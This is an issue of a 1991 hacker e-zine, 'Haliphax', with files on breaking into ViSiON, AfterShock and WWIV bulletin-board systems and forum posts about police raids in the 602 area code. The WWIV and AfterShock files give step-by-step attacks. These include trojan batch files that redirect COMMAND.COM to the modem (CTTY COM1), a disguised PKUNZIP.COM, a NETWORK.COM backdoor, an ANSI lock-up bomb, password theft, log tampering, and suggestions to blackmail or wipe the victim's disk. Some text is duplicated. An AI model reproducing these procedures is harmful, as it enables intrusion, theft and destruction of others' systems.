                               ==Haliphax==

                     Volume One, Issue 6, File 1 of XX

                  Haliphax Inc. Newsletter Issue VI Index
                  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        Welcome to Haliphax VI! This is like the new start of Haliphax. Well
I met Dr. C on CyberNet 504-I a couple weeks ago and now's we're really getin
into this stuff. He is an expert in viruses and programming so he's helping
make Haliphax now! He's also an all around cool guy (and best of all, NOT a
k-rad warez d00d). It feels good to be back with some way to spread info all
around the bbs world!

DISCLAIMER : This file is for information purposes only. Points on views in
this magazine may or may not be the opinions of all the HaliphaX members. If
you choose to use this textphile to do a boo-boo then don't blame us!

EDITORS : iNVALiD MEDiA, Dr. C, Tym Phactor, Phantasm

DISTRIBUTION : Stealth Technologies (504-PRI-VATE)      Sysop : Dr. C
               Phortress Systems IV (602-PRI-VATE)      Sysop : iNVALiD MEDiA

Subject/Article Title:                  Author/Source
~~~~~~~~~~~~~~~~~~~~~~                  ~~~~~~~~~~~~~
Phile 1 : Bugs/Errors in ViSiON         iNVALiD MEDiA
Phile 2 : Bugs/Errors in AfterShock     iNVALiD MEDiA
Phile 3 : Crashing AfterShock (humor)   Reaper of Vengeance
Phile 4 : Crashing WWIV                 iNVALiD MEDiA (part II by Vision)
Phile 5 : Operation Sun Devil II        -Taken from posts on
          The Bust of "Mind Rape"       -Grail Quest (602)
                                        -The Cardboard Box (602)
                                        -Zycor's Lair (602)
Phile 6 : The Dark Avenger Source Code in Assembly Language
Phile 7 : Making Ansi Trojans (from 1989 but still works)
Phile 8 : Leprosy Source Code in Assembly
Phile 9 : Leprosy Source Code in C
Phile 10: General Virus Overview - Pt1  Dr. C
Phile 11: Hacking Internet              A. Uzziah
Phile 12: Messages 1-376 on Lutzifer    -Log file
Phile 13: Haliphax Pro-Phile on Johnny Rotten (Sysop - CyberNet 504-I)

(* The Phollowing is to be taken as humorous anarchy and not as REAL *)
(* HaliphaX Material... *)

Phile 14: Fucking Stuffed Animals       iNVALiD MEDiA
Phile 15: Da Story of Micro's HEX Life  Tym Phactor
______________________________________________________________________________
Phile 1 : Bugs/Errors in ViSiON

                        %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                        % Fucking w/ ViSiON .82-.83 %
                        %     by iNVALiD MEDiA      %   Edited 9/21/91
                        %       //HaliphaX\\        %
                        %%%%%%%%%%%%%%%%%%%%%%%%%%%%%

There are a lot of Forum-PC hacks out there. One of my favorite hacks is LSD.
LSD was made by Slavelord and is one of today's best (along with Celerity and
in my opinion, ViSiON). ViSiON was made from the very buggy LSD 1.06 Source
code which was stolen from Slavelord. ViSiON/X .90 is finally out. I have no
experience with ViSiON .90 since I haven't even SEEN it yet, let along done
anything with it.

:: Locking up ViSiON ::

There are many simple little ways to lock up a ViSiON board.

1) If you call voice and let it 'beep' for a considerable amount of time, and
   then hang up, it was fuck around with the modem on the sysop's end so if
   you call back RIGHT AWAY, it is still in the middle of initializing so it
   will on certain occasions lock it up. Works better on .82 than .83.

2) Hanging up in certain areas of the board will also lock it up for a while.
   If you just hang up in the middle of an ansi screem, the board will hang
   for a couple minutes before initilazing the sysop's modem again and if you
   keep calling while its locked up for the 2 minutes, it occasionally locks
   up. I have found this to work on both .82 and .83.

:: Errors in Ymodem-G ::

I have found a very serious error in Ymodem-G transfers. On half the boards
running ViSiON, Ymodem-G is installed wrong. If you start a Ymodem-G transfer
the sysop's side will mess up and NOT start sending you data. You wlil be in
a nice little paralized, blank screen, no promt mode once you get out of
Ymodem-G. You can't do anything. When you hang up and call again, it will
log you into your account RIGHT when you connect. This is very dangerous. It
does not happen if the Ymodem-G transfer goes well. This isn't just an error
with YOUR protocols as some of you might be saying now; I have done it from
other people's houses, different setups, etc and ran ViSiON myself.
So if a Ymodem-G transfer in ViSiON gets messed up, CALL BACK or your account
might be open for the next user who calls. This works mostly on ViSiON .83
boards; haven't had it happen in .82.

This has been an iNVALiD MEDiA Productions!
______________________________________________________________________________
Phile 2 : Bugs/Erros in AfterShock

                         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                         %  Crashing AfterShock BBS  %
                         %     by iNVALiD MEDiA      %
                         %       //Haliphax\\        %
                         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%

:: Notes ::

AfterShock is a good piece of software written by The FRiTZ. It is up to ver-
sion 1.24 (as far as I know) but only version 1.22 is supposed to be out for
the general public's use. I have 1.23 Beta which I found on some board out in
Washington.

:: File Transfers ::

AfterShock has MANY bugs. One of them occurs in the file transfer area. When
you upload a file, it does not get added to the file list; just stays on the
sysop's drive until he gets a chance to add it to the list. This is one of the
worst bugs in AfterShock. It occurs in ALL of the versions that I have seen
since 1.20.

:: Crashing AfterShock ::

-=> Requirements <=-
The BBS should not have a System Password.
Your phone and modem have to be on the same line.
Your phone has to be plugged directly into the wall so that it makes "line
noise: when picked up!

-=> The Crash <=-
Login to your favorite AfterShock board as the System Operator. The SysOp's
account is ALWAYS 1. When asked for the password, pick up the phone. This will
generate a bunch of line noise to the board and if done right (try more than
once) should pass the password prompt and log you into the sysop's account.
Once you are in, you can use the % command from anywhere to go into the Sysop
commands. I recomment doing it in the file section, adding an area. Add the
main BBS file area (usually /SHOCK, /AFTER, /BBS, /AS122, etc). From there
all any of the files that you want and SYSLOG.DAT. Then erase the files that
you want ans SYSLOG.DAT which is the System Log. Also erase the errorlog.

Download the CONFIG.*. Shell to dos and modify the bbs configuration (also
be sure to get the system passwords, etc) to make it so that doors are allowed
on the system and remote door maintenance is allowed. Re-upload the config
files (just the saved data file). Do a user edit, etc and get the sysop's
password or just create a bullshit user and give him the highest access. Then
log off and call back again. Log in under your newly acquired accounts and its
off to work you go.

You might wanna leach the sysop or totally trash his system.

This has been an iNVALiD MEDiA production!

Remember, do this but don't blame me if you get caught! heh this is for
educational purposes only!
______________________________________________________________________________
Phile 3 : Crashing AfterShock (humor)
                                     
Title:   How to crash AfterShock 1.23
Updated: 4:52 pm at 8/20/91


Well, to hack AfterShock 1.23, try this, as noted in Virus Weekly.

 1.  Let the system operator know.  If he doesn't answer the page, it's probably
     safe to go ahead and trash him.
 2.  Go into the message base.
 3.  Enter the third base on your area list.
 4.  Read the third message.
 5.  Quit immediately to the main menu.
 6.  Go to the door menu.
 7.  Open the first door.
 8.  Quit as soon as possible.
 9.  Send feedback to the sysop.  This is needed, so why not cuss him out?
     You're gonna trash his system, so he won't notice.
10.  Enter the file area.
11.  Give yourself sysop access. (this is only available if you do the above
     EXACTLY)  For the sysop access, hit ALT-H.
12.  Quit back to the main menu.
13.  Type //SHELL.
14.  Screw over the board!
______________________________________________________________________________
Phile 4 : Crashing WWIV

                        %%%%%%%%%%%%%%%%%%%%%%%%%%%%
                        %   Crashing a WWIV Bbs!   %
                        %     by iNVALiD MEDiA     %    Updated 9/21/91
                        %      // Haliphax \\      %
                        %%%%%%%%%%%%%%%%%%%%%%%%%%%%

* NOTE * Part II was taken from a text file called WWIVHACK.ZIP written by
         Vision.

        -=> Part I <=-

Ok log on to your favorite WWIV bbs and say that you are new to bbsing and give
the lame sysop some bullshit about yourself. He'll fall for it and you'll be
validated!

:: Low Security WWIV ::

Log on to the board, go into the file area, upload a file called TEST.ZIP to
the bbs. Make sure the uploaded don't go to the sysop! In the TEST.ZIP file
you should have the file called PKUNZIP.BAT. The pkunzip.bat file should
consist of these lines:
CTTY COM1 (or whatever com port he's using)
COMMAND.COM (or C:, CD\, COMMAND.COM if its not in his path)
Type E to get into the extract commands of the system. It gives you a prompt
like this -

Extract to temporary directory:

Filename:

{This is where you type in TEST.ZIP}

Filename: TEST.ZIP

TEST.ZIP   :   3k : Description of File that you uploaded
Extract What (?=list,Q=abort) ?

From there, type * . The Software will run extract all the files from the TEST
zipfile and will extract the pkunzip.bat file. When you get the
Extract What (?=list,Q=abort) ? prompt again, type * once again. The stupid
software will now run you PKUNZIP.BAT file instead of PKUNZIP.EXE and you're
in DOS!
[See -What to do in DOS-]

:: High Security WWIV ::

What I mean by this is 1) all uploads go to the sysop 2) New User Password
3) Invite Only 4) Uses different ansi drive 5) etc etc... you get the general
idea, don't you. Well in this type of situation, just log on apply and maybe
get validated. Get a pd or a pirate file and stick the PKUNZIP.BAT file in the
zip. Onlu this time, put some extra bullshit lines in the pkunzip.bat file like
this :
CTTY COM1
If Exist AAAAA.AAA goto SUCKER
C:
CD\
COMMAND.COM
:sucker
Put a list of a trillio DOS commands or some ECHO statements here...
Once you do this, compile it and you'll have a PKUNZIP.COM thats about 20 or so
k in length. Make it as close to the REAL pkunzip.exe size as possible. Stick
that pkunzip.com fake file into your legit pirate ware and upload it to the
sysop. He'll check it out (and probably won't notice the PKUNZIP.COM file) and
then stick it online. Thats when you do the work!

:: What to do in DOS ::

Well, he's it put simply... go into the GFILES dir, type out the *.log files
and capture them into a small text file... modify them to make it look like
nothing happened and upload them again. Edit the LASTON.TXT file too. This
way, the sysop won't know that anything happened!

:: Other Ways to do Shit ::
To lock up a bbs, do this:
Make an ansi and put this line in it :
ESC [23;1234567891011
This will lock up the bbs. Put this into multiple emails so whenever someone
logs onto the bbs, it will lock up. Or stick it somewhere where it will be
seen a lot and not noticed by the sysop (PD subs on a pirate board, Email,
to give you a few ideas).
Another way is to just slam on the keyboard if you enter a door that shrinks
when it runs... this is really simple but works!!
Hope this will let you ruin your favorite lame ass WWIV board!

Sysops, to stop this from happening,
1)      take out the extract commands or rename pkzip/pkunzip to something
        really unique that a hacker won't figure out and use those filenames
        in place of pkzip/pkunzip in the INIT program.
2)      Use a different ansi driver so that ansi bombs will not be as
        effective.
3)      Have a New User Password and make sure that New Users have NO ACCESS
        to the file section/message areas. If you want them to have post
        access, give them the M restriction.

:: Extra Notes ::

When in the GFILES directory of WWIV, type out the log file (eg 092191.LOG)
for the day and log it to disk. Go into your text editor and edit the logged
file and make it look like nothing happened. Then use DSZ rz on the sysop's
end and send him the file. This is better than just erasing the log files
because the sysop won't grow as suspicious.

        -=> Part II <=- (by Vision)

:: The DSZ Backdoor ::

The method is old and I don't think it will work on the newer WWIV's. In fact,
I KNOW it won't work on the newer WWIV's. There was a scare way back when in
602 when some dude crashed a lot of the WWIV boards with this process. Since
then a lot of boards in 602 and everywhere else became cautious of this...

** Requirements of BBS **

1) Unmodified WWIV
2) Unregistered DSZ
3) Stupid Sysop
4) The bbs has to be in a network (WWIVLink, WWIVNet, or some local one)

Ok call up your favorite WWIV board under a false handle and bullshit your
way into access (if you're too stupid to do this, you're too stupid to do
THIS). It is better to do this to a lame PD board since they don't have access
to shit that registers WWIV; the pirate boards usually do. Make sure the
sysop have an unregistered copy of DSZ installed. It is important that it be
unregistered. If its registered, try the Extract Commands.

Ok now before you actually do the fun thimg (crash the board!), you have to
create a few files. These files are :

1) DLZ.BAT
   This file will let you download files from the sysop's hard drive. This
   file should contain the lines :

   CLS
   CTTY CON
   DSZ port1 speed2400 sz %1    {whatever baud the sysop is at}
   CTTY COM1    {whatever com port the sysop is at}
   CLS

2) HACK.BAT
    This is the actual file that will get you into the sysop's DOS. This file
    should contain the lines :

    CTTY COM1   {whatever com post the sysop is at}
    C:          {just in case enter these lines. Some sysops are smart!}
    CD\
    COMMAND.COM

3) NETWORK.COM
   This is the file that runs during the net hours.
   In QuickBasic, the file is :

   SHELL "DEL NETWORK.COM"
   SHELL "HACK.BAT"

   Compile & link it to NETWORK.EXE then rename it to NETWORK.COM.  This
   will delete itself and run HACK.BAT.  If you want, do it in Pascal or
   any other language that you are good at. It won't make ANY difference.

Call back and go straight to the transfer section.  Upload (to any directory,
 or directly to the SysOp).  When prompted for the file name, enter
  "????????.???" (eight ?'s then three ?'s, without the quotes).  You'll see
   the Zmodem receive string.  Upload one of the above files.  The BBS will
    say, "transfer aborted"... but you know better!  Repeat until all files
     have been uploaded.

Call back very shortly afterwards (thirty seconds, no more, no less).  When
you get the "NN:" prompt, enter "!-@NETWORK@-!" (again, no quotes).  This
will access the unpassworded WWIVnet account (the password routines are
external).  When the BBS sees this, it will drop to DOS and run NETWORK.EXE.
However, since COMs are run before EXEs, your NETWORK.COM will be executed
promptly turning control over to you via HACK.BAT!  Now that you are in
DOS, there are a few things that you must immediately do.

Use DLZD.BAT to leech the target's CONFIG.DAT from his main BBS directory (the
 one you were dumped in when you arrived).  The format is:

        DLZ <filename>

  where <filename> is the name of the file.  For example,

        DLZ CONFIG.DAT

   will leech the configuration file.

Go to his BBS DATA directory.  This is usually C:\WWIV\DATA, but you might
have to look around a little bit.  When you find it, use DLZ to leech the
target's USER.LST.  Using Norton Utilities or any hex and/or text editor, it
is very easy to see where the usernames and their passwords are stored.
Go into the GFILES directory and type out the Sysop Log (911232.log or whatever
the current date is). Log them to disk and modify them. Then upload them. If
you want to make it faster, just erase them!

If the target is in WWIVnet or WWIVlink, download his/her CALLOUT.NET file fro
 the aforementioned data directory.  This will be explained later.

Delete HACK.BAT if you haven't already!

Look around.  Leech anything that looks interesting.  This includes:

          :~ Private G-Files from the G-File section
Good for _:  Lists of credit-card or calling-card numbers
blackmail :  Pirate files
          :  His dialing directories from Telemate or Telix; these usually
          :   contain passwords and numbers of private BBS's!
          :  If he is of age and has a job, you might be able to leach some
          :   PRIVATE information!
           ~
Hang up.  If you really hate him, upload Norton's WIPEDISK.EXE along with the
 rest of the files, run it, and permanently destroy all data on his drive.
  This is generally not recommended, because so far he has NO WAY of knowing
   you were in unless he watched.

---------
Tips:
---------

        a) In the target's logs, nothing will show except that you hit 'U'
            when you were online and quit before the upload started.  This is
             virtually always overlooked, and logs more than two days old are
              usually deleted.

        b) In the target's net logs, he'll probably see a >NO NET<, which is
            rather common.

        c) Very close to the beginning of CONFIG.DAT and right before the first
           directory entry (usually "MSGS\") you will find the target's
           SYSTEM PASSWORD.  This is needed if you are going to log on as
           him or a remote sysop.

        d) If a sysop logs on, it is not noted in the LAST FEW CALLERS screen
            OR the logs.

        e) A few commands that you will want to try out when you are online as
            #1 are:

                //DOS
                //UEDIT
                //BOARDEDIT
                //DIREDIT
                //GFILEEDIT
                //CHUSER

           In the file section try:

                //UPLAOD
                //SORT
                //MOVE
                R

             Most require the system password, but if you're online as the
              sysop you already have that.

        f) You can have great fun with planted and rouge mailing if you have
            a copy of WWIV and the victim's CALLOUT.NET.  CALLOUT.NET has a
             little note after every entry that looks something like:

                "KAOIYQIGNADFUKG"

               Or another random password.  Read WWIVTECH.DOC and W
               (available on most WWIV boards) for more information.  You
               should be able to pick up/drop off mail supposedly from and
               to your target very easily for about a week.  When you start
               getting >BAD PASSWORD<, get back into your victim's DOS
               and get the passwords again!

        g) You should be able to figure out what to do with the password file.


        h) NEVER, NEVER, NEVER press backspace when there is nothing to
            backspace!  This will have catastophic effects and will definintel
             crash CTTY!

        i) This file is provided to inform WWIV sysops of this threat.  If
            somebody uses it for "bad" purposes, it is not my fault.

Later!
                          \        /
                       <=---\----/--i--s--i--o--n---=>
                              \/

               Or another random password.  Read WWIVTECH.DOC and W
               (available on most WWIV boards) for more information.  You
               should be able to pick up/drop off mail supposedly from and
               to your target very easily for about a week.  When you start
               getting >BAD PASSWORD<, get back into your victim's DOS
               and get the passwords again!

        g) You should be able to figure out what to do with the password file.


        h) NEVER, NEVER, NEVER press backspace when there is nothing to
            backspace!  This will have catastophic effects and will definintel
             crash CTTY!

        i) This file is provided to inform WWIV sysops of this threat.  If
            somebody uses it for "bad" purposes, it is not my fault.
______________________________________________________________________________
Phile 5 :
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
<>           Operation Sun Devil II - The Gail Thackery Fan Club            <>
<>               Compilation from posts in the 602 Area Code                <>
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

 File : 602BUST.SEP
 Desc : Posts pertaining to 602's recent legal problems in September of '91
 Orgn : Post taken from The Grail Quest (602-256-0106) and The Cardboard Box
         (602-247-3754) and Zycor's Lair (602-957-6436)
 Ok here's whats happening, Operation Sun Devil II is is full effect. This
 is a collection of posts from a few boards talking about the recent busts.
 NSA is really involved in this. So is The Love Connection ( distro).
 This file was compiled by iNVALiD MEDiA  start of phile :

47/50: ..
Name: Irie Man #3 @16209
Date: Sun Sep 22 02:03:39 1991

Do Not Call The Love Connection!
..
LEGAL PROBLEMS FROM HELL!
..
I'm Outta here till shit clears up!
have fun people..
..
IRIE MAN IS OUTTA HERE!!

49/50: Taurus
Name: Lord Dimwit Flathead #18 @16209
Date: Sun Sep 22 11:12:08 1991



    Hmm...logged on today to find a message from Taurus/Switchblade/Bonzai,
    threatening with the fact that "he had all my stats phone, address, anem
    credit card info"...gee, whatta a K-Rad guy!

    Why don't you bust his sorry ass, Merovingian?  This guy is a class-A
    loser...what in the hell does he contribute to the board, other than
    being the "village idiot"...?

50/50: If I'm correct...
Name: The Assembler #192 @16209
Date: Sun Sep 22 18:22:55 1991

RE: ...

The whole search warrent could be turned over in court if they siezed things
like that on it???  You at least have grounds to sue on "Illegal Siesure"
grounds...

38/50: ...
Name: Astro #402
Date: Sun Sep 22 06:51:49 1991


    The following is (sort of) a public service announcement. Please don't
delete this for it is important that as many people as possible see it. You
may edit and words you deem offensive out, but please leave the content of the
message intact. Thank You.:


       The Phoenix Police Department/Federal Beareu of Investigations and many
other "reputable" organizations have conducted an etrosity upon the community.
They have confiscated many numerous items not pertaining to the investigation
being conducted. They have trashed/slashed/stolen many things that have
NOTHING to do with computer equipment whatsoever. An issued warrant for the
search and seizure of computer matterials was turned into a field day for
overambitious and undertrained "special agents" of these organizations. These
organizations include: Phx. PD, FBI, LDL, IBM, etc. What does a high school
diploma, yearbook, and college acceptance certificate have to do with computer
conspiracy?!?! Absolutely fucking NOTHING!
        Well, that is all, I guess. Only because I can't think of anything else
to say. Except that the last two days were uncalled for and total bullshit!
Now, I will admit SOME of the accusations of certain crimes are true. Most of
them aren't. The main reason for this post is because of the appauling
treatment of said property and person (you know who, and if you don't, you
should pay better attention). Not to mention the fact that this post was
requested by someone EXTREMELY involved.

39/50: We will leave it intact, or at least I will.
Name: Madman #56
Date: Sun Sep 22 07:13:17 1991

RE: ...

But a yearbook could be used to get pictures or leads on associates, diplomas
and acceptance certificates would not do much except fill in as hard proof
where someone was going to school. But those are minor things...

As with a search, though, I think they can take ANYTHING they want as long as
it is in the place covered by the warrant...

ͻ
 MADMAN! 
ͼ

41/50: I have no respect...
Name: Bugs #24
Date: Sun Sep 22 12:02:16 1991

RE: Actually

for hackers. Period. It dosen't make any sense. And I see
no reason for that kind of destructive behavior.

I could shoot a hacker.

                               ~~~\/BUGS

42/50: I'd
Name: Bugs #24
Date: Sun Sep 22 12:05:38 1991

RE: ...

Like to hear what infractions DID occur? The FBI dosen't waste
their time on bullshit. You said there were "SOME" accusations
that were true.

WHAT WERE THEY?

                            ~~~\/BUGS

43/50: Seizures During Searches
Name: Steve #136
Date: Sun Sep 22 15:04:33 1991

From what I know (only hearsay) when a warrant is served, it has to describe
the item(s) being sought and that is the only thing they can confiscate.  If
they are searching for, say, cocaine, then if they find plastic explosives,
they have to get another warrant to seize it.  Anyone who knows please correct
or dispute my assertions.

44/50: replies....
Name: Full Moon #12
Date: Sun Sep 22 17:17:43 1991

first off, yeah the fbi does waste its time on bullshit.....
prime example:  Steve Jackson Games.

second, piracy is something that is incredibly minor to federals, at least for
the time being, and hacking and phreaking take priority for obvious reasons.
in fact, i havent seen any pirate boards go down, with the exception of really
big ones in florida and missouri.  most hacker/phreaker type don't play the
pirate game anyway.

and not all hackers are destructive.  i could shoot someone who would shoot
me.  Period.

thank you, and please keep your fish out of the ceiling.

45/50: isn't
Name: The Rush #590
Date: Sun Sep 22 17:29:02 1991

it instead of taking whatever is on the list, taking every piece of computer
equipment that a person owns who may be caught and then the officer or whoever
is seizing the equipment has to make a list of whatever they're taking?

That's the way I always saw it.

good luck

I think you may need it.

The Rush

46/50: ...
Name: Damaged #303
Date: Sun Sep 22 17:53:15 1991

RE: I have no respect...

Bahaha, coming from a Unknown location, dude!  You are a fucking moron!

Most Hackers are NOT destructive!  You believe media lies to MUCH!

DAMN

47/50: and
Name: Damaged #303
Date: Sun Sep 22 17:54:59 1991

Also they DID NOT include items that they took, and put them on the list!

48/50: bugs..
Name: The Toad #68
Date: Sun Sep 22 19:38:27 1991

RE: I have no respect...

go to hell I was never destructive dud eyo ugot it all wrong, one rule I go
bye is : Never destroy what you do not need to. only cover your tracks.
Not ALL of us are/WERE destructive,
nother week to go and i'll feel safe (partially).

49/50: See...
Name: Bluejay Bandit #183
Date: Mon Sep 23 00:33:30 1991

If NSA was "smart", which they have proven otherwise, they would NEVER have
HAD this problem...

The Feds are out there.  And they know who you are and what you do.  Whether
they choose to DO something about or just let if keep happening until
something "larger" comes about, thats totally up to them.

Your life is scrutinized day in, day out.  You are not free.  You are on a
leash.

Remember that....

/

50/50: Oh...
Name: Bluejay Bandit #183
Date: Mon Sep 23 00:44:40 1991

and that virus.  Is it that one written in PASCAL that writes itself to
selective .EXE's on a disk?  #5 I think it was?

Easily killable.  Nothing to worry about, people.

50/50: ...
Name: Invalid Media #243 @16209
Date: Sun Sep 22 22:48:38 1991

Was anyone seriously busted in this thing or is it just fear of getting
busted? Was Love Connected busted...

Is this gonna be Sun Devil II? Over past month and a half I have seen 2 people
gotten calls from the FBI... concerning hacking/phreaking and boards...

                                 iNVALiD MEDiA

50/50: To all of you in trouble...
Name: Binary #18
Date: Mon Sep 23 01:41:21 1991

Well, I don't know you (i think) and I don't know the whole story...


But good luck anyway...

                                  -=[<>]=-Binary-=[<>]=-

Step right up folks...     ANARCHY for sale!!!

50/50: Love Connection
Name: Two Wheel Demon #30
Date: Mon Sep 23 13:15:58 1991

RE: Hey man

the same post was up at Cardboard box, seems that Love Connectiona nd Toad are
running scared, I wasn't in town so I don't know what was happening, can
anyone fill me in, where they busting computer users again.

42/50: ..
Name: Irie Man #3 @16209
Date: Mon Sep 23 02:03:18 1991

Someone E-mail me on EVERYTHING about Gail Thachery..I found out something
tonight and I want to know everything about this bitch!
CAT..ASTRO..DD..and others Close friends Call me ASAP! I Just talked to the
MAN..and I have to talk at someone.

44/50: ...
Name: Astro #152 @16209
Date: Mon Sep 23 02:27:08 1991

RE: If I'm correct...


    Illegal search and seizure, destruction of priv. property, harrassment,
invasion of privacy, deformation of character, theft, etc...

45/50: ???
Name: Astro #152 @16209
Date: Mon Sep 23 02:28:51 1991

RE: ...


    Love Connection WAS NOT busted. Just taken down for security reasons. WHO
got calls???? It's important for you to tell me this. E-Mail me. L8r

47/50: Astro...
Name: Opus #121 @16209
Date: Mon Sep 23 10:34:01 1991

RE: ...


    What's else is fucking new? The Feds are invincible and answer to no one.
You're screwed and it's not the first time...

                                     [Opus]

48/50: the
Name: Goliath #67 @16209
Date: Mon Sep 23 11:56:42 1991

RE: de

sausage king of Chicago is Abe Froehman.

goodie gum-drops

49/50: hey
Name: Goliath #67 @16209
Date: Mon Sep 23 11:57:55 1991

RE: Things that make you go "Hmmmmm"...........

Nexus did you know you are named after a shampoo?


just a though

This is the Ctrl-D Macro/s

50/50: It's doctors and lawyers and
Name: The Masked Poster #255 @16209
Date: Mon Sep 23 13:06:22 1991

The end of the world...


Sorry, I'm just feeling a little superior tonight...


Another fucking heather??

No dad, what about you???    FUCK YOU!!!


The truth is a virus

Talk Hard

30/50: ...
Name: Astro #402
Date: Mon Sep 23 05:43:13 1991

RE: We will leave it intact, or at least I will.


    Well, for one thing, he wasn't IN the yearbook, and his mom told them that
(while pinned to the kitchen table). As for "anything", NO! The warrant
specicied "COMPUTER EQUIPMENT", which they took. They ALSO took clothes,
furniture, milk crates (?!?!), and the rest of his room. 90% of the things
that they "confiscated" had nothing to do with ANYTHING.

31/50: ...
Name: Astro #402
Date: Mon Sep 23 05:44:29 1991

RE: I have no respect...


    Misconceptions will be your undoing...



32/50: ...
Name: Astro #402
Date: Mon Sep 23 05:47:22 1991

RE: I'd


    Using outdials and doing exchange scans. WHOOOOPIE! Gee, arrest half the
BBS community!
    As for infractions on their part, illegal search and seizure, harrassment,
deformation of character, destruction of priv. property, the list goes on....



33/50: All true.
Name: Astro #402
Date: Mon Sep 23 05:50:19 1991

RE: Seizures During Searches


    ALSO, if they find, say, computer disks, they ARE NOT allowed to use them
or even do a directory on them. Same goes for video. If the police find a
video tape of you molesting 6 year olds, that is not valid evidence for they
are not allowed to view it...



34/50: ...
Name: Astro #402
Date: Mon Sep 23 05:52:19 1991

RE: isn't


    Nope, in an inventory search, they can take ONLY what's on the warrant...



35/50: !!!
Name: Astro #402
Date: Mon Sep 23 05:56:55 1991

RE: See...


    Sorry, bud, but NSA has nothing to do with this. For some reason, this is
personal...



36/50: So has anything happened
Name: Two Wheel Demon #60
Date: Mon Sep 23 08:08:06 1991

concerning the post from the Toad about another Sun Devil operation. Did
people get busted while I was gone????


                              Tw Wh Dmn     



37/50: Now
Name: Madman #56
Date: Mon Sep 23 09:32:11 1991

RE: ...

that sounds a bit much...maybe a good lawyer would be in order. I will ask a
person I know on another board about warrants and such and see what he says
and get back to you...

ͻ
 MADMAN! 
ͼ



38/50: Sorry to bust your bubble Toad!
Name: The Grunt #20
Date: Mon Sep 23 10:27:41 1991

But Hacking can be a very serious felony, and on very serious felony there is
no date when you will be safe! Prosecution can take place in 20 years on that!
There is no limit for conviction on a serious felony! Most likely (Since you
are a little kid) you did not commit a serious felony. But, the lowest felony
charge can be prosecuted after 3 years!

Ŀ
Ŀ




39/50: ...
Name: Damaged #303
Date: Mon Sep 23 11:01:08 1991

RE: Oh...

hahahaha, there are 6 versions of it.  And all of them translated to C



40/50: All I've got to say about hacking...
Name: Bugs #24
Date: Mon Sep 23 11:39:30 1991

is this. I stick by the statements I've made and I'd like to add this.

If hackers had real lives, by that I mean getting some sunshine and
getting laid instead of hugging a compute all day they wouldn't
be in as much trouble as they are in. If this is their idea of
recreation; stealing hard working people's ideas and work then
I want no part of it.

I'm also in favor of even more strict laws prohibiting idiots who
obviously can't govern themselves.

I must also admonish the sysops of this board for allowing blatant
members of such behavior to stay on board here. Whatsa matter?
'Fraid that if you try to eliminate them they'll crash your board?

                                       ~~~\/BUGS



41/50: Searched by the feds
Name: Troubled Youth #115
Date: Mon Sep 23 12:31:29 1991

RE: replies....

10 times, always for fiber samples.  Never found a match.  Don't worry, be
happy.




42/50: may]
Name: Goliath #399
Date: Mon Sep 23 13:46:26 1991

RE: I'd...

be that's because you don';t know any hackers Bugs. Probably because no one
likes you anyway.



43/50: ...
Name: Damaged #303
Date: Mon Sep 23 15:19:23 1991

RE: All I've got to say about hacking...

This proves you ARE A FUCKING IDIOT!

One "True Hackers" do not CRASH Boards, only idiots that do that.

2!  If it WASN'T for HACKERS, you wouldn't be sitting here BBS'N!  Hackers
CREATED this world!

3.  Hackers do live a life also!  But what is wrong witha little computer
liking, Hell!  I fucking sit my compter for hours upon ends, and I still have
time for my girl, partying, talking to friends and STILL go to college (well ).

I'm sorry but you are so uninformed that, you are engaging without a life
preserver!5*



44/50: bahahaha
Name: The Toad #68
Date: Mon Sep 23 18:04:12 1991

RE: All I've got to say about hacking...

REal lifes? bahaha dude you do not know most of us, Also I would NEVER NEVER
take down this board, for some reason I am fond of this board. More strict
laws? bahahaha that would only create more hackers, for one I do know as a
fact if ALL information was FREE to the public there would be NO TRUE HACKERS,
If phone bill swere owered there would be no reason for people to phreak.
And MADMAN be afraid of us? I cerntinly hope not.



45/50: I hafta
Name: The Rush #590
Date: Mon Sep 23 18:23:44 1991

admit - I don't have any problems with hackers. I stay outa their business.

They get treated like crap, though, and that really sucks. Because a lot of
people don't pay taxes (I'm not pointing fingers at anyone on this board, just
some people in general), yet they get at least halfway decent treatment by
others.



46/50: actually bugs....
Name: Full Moon #12
Date: Mon Sep 23 18:47:18 1991

RE: All I've got to say about hacking...

the sysops here have open minds and they believe EVERY side of a story should
be told.  some of what you said might be true, but your misconceptions fail
you... i believe none of these guys 'stole' anything or damaged anything,
besides maybe phone time.  these guys are very smart, most of the bbs
population (such as yourself) wouldn't know the first things to  do to hack
into an orange.  i am glad your opinions are only opinions, otherwise
misconceptions and lack of understanding would rule the bloody country.

and a note, i am not defending what they did, i am defending their right to
defend themselves.  and people like bugs piss me off.  he stands as the
ultimate 'joe public' who makes definitative judgements without getting his
bloody facts straight.

thank you and god bless....



47/50: good point
Name: Full Moon #12
Date: Mon Sep 23 18:48:22 1991

RE: ...

this little cyberspace world was created by hackers.  or didnt bugs know that?



48/50: Hmmm... Sounds like a few people had a Hell Week...
Name: The Crazy Zonie #368
Date: Mon Sep 23 21:26:56 1991

Sorry for jumping in like this...

1) Would someone please email me on what the "Charges" Were? (I don't have to
know what was true or not. Just what the FBI was searching for!)

2) The Police (All investigative forces) are only to take what's listed on the
Warrent! That means that they can tear up your room to find it, but they can
only take those objects RELATED to the search warrent! (You can bust them by
having an Itemized list of all that was NOT involved with the crime that
disappered!)

3) Pirating- I don't really approve of it, but there is no way to get started
in the Computer Arina without getting some hardware illeagally! (Basically, I
do not know of anyone who doesn't have something illeagle!)

4) VIRUSES?!?!?! I'M SORRY, BUT THAT IS JUST ONE AREA OF PROGRAMING THAT I
WILL NOT STAND FOR!!! FOR THE MOST PART, WE'RE FRIENDS, SO WE DON'T NEED SOME
PUBESENT BRAT TRYING TO DOWN ALL UNSUSPECTING PEOPLE (pretty much everyone!)
COMPUTER! I WILL NOT STAND FOR BENINE VIRUSES AND SUCH JUST FOR THE SAME
PRINCIPLE! I DO NOT GO ARROND AND TRY TO DO DILIBRATE MALACE TO THE REST OF
YOU, AND I EXPECT THE SAME BACK!

5)Hacking... Well, like the Pirating, same thing...

Well, for the most part, I wish for the best!

The Crazy ZOnie...

Sorry for such a long post!



49/50: Hacking/Cracking
Name: The Whiz Kid #78
Date: Mon Sep 23 23:36:52 1991

